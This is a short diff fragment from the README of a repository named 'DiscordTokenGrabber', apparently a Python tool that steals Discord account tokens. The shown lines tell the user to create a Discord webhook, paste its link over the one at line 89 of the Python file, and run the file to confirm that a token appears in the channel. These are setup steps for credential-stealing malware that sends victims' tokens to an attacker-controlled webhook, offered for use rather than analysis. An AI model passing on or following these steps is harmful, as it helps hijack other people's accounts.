PrettyGoodPrivacy/DiscordTokenGrabber/README.md

 access it.

-After that make a webhook to the channel, copy the webhook link then open the python file using notepad and scroll down till u see a webhook link, your gonna replace that link with your own.
+After that make a webhook to the channel, copy the webhook link then open the python file using notepad and scroll down till u see a webhook link (line 89), your gonna replace that link with your own.
 To test if you have done this right, run the file and see if ur token pops up in the channel.

 Example: https://pasteboard.co/JShQnuN.png